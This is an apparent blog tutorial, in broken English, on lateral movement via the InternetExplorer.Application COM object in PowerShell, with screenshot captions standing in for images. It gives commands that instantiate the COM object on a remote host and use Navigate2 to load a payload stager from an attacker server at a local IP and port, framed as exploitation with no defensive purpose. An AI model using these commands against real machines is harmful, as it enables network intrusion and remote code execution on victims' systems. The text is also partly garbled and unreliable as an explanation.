Lateral Movement Using internetexplorer.Application Object ( COM )

introduction
Use Object COM ( InternetExplorer.Application ) For Execute using Types Exploit-internet Explorer For Execute ==>
in Add On Internet Explorer For Get Execute Code using Lateral Movement ( The Component Object Model COM ) in PowerShell

Lateral Movement:> 

Are the techniques that specialize in access to resources, and applications and the implementation of code on applications, and resources And Getting On information, And Getting Simulation of system without using tools, remotely,   More-Lateral Movement
In my research I have found objects that deal with Object DCOM in COM CLSID is a description for all this Bits long and consider This ( SID ) About this Bits long DCOM/CLSID/AppID, Here is the translation From CLSID  For this words,

Screenshot from 2018-02-15 16-53-10

Here If we explain the meaning of these ( BITs/CLSID ) For Language The result will be = Object COM ( InternetExplorer.Application ) Now let’s take a look at the lateral movement COM PowerShell,

$Object_COM = [Activator]::CreateInstance([type]::GetTypeFromProgID("InternetExplorer.Application","192.168.1.6"))

Capture

Here the operations will start and start getting executed, Here you have two method For Execute Lateral Movement COM Execution visible or hidden in PowerShell COM look at this Note For Operation Run Browser internet Explorer Only in Method Lateral Movement Object ( InternetExplorer.Application )

1 New-Object in PowerShell
2 hidden Ex in PowerShell

Capture.PNG

Hey Note Look at this There are methods to add a Method, Change, URLs Browser internet explorer, the currently And guidance to This Site OR URL, Which you will put this in Method For Change URL, Exploitation For Projection Payload

Capture

Here You Can use Method ( LocationURL ) For add URL Exploitation in Session iexplorer Browser Now For Projection Payload-Stager, Let’s take a look, now You can use insert For add URL Exploitation, For Execute,

Capture

Here Now You Can Look at this Like this For use insert With Method Vaule,

Capture

Now Let’s try the second visible method I can get the same automatic execution at this the Method, ( New-OBject COM )  New-Object -COMObject InternetExplorer.Application -Property @{Navigate2=”http://192.168
.1.7:8080/o6JNkhtA1NTzR”; Visible = $True}

Capture
Screenshot from 2018-02-15 19-44-56

Leave a comment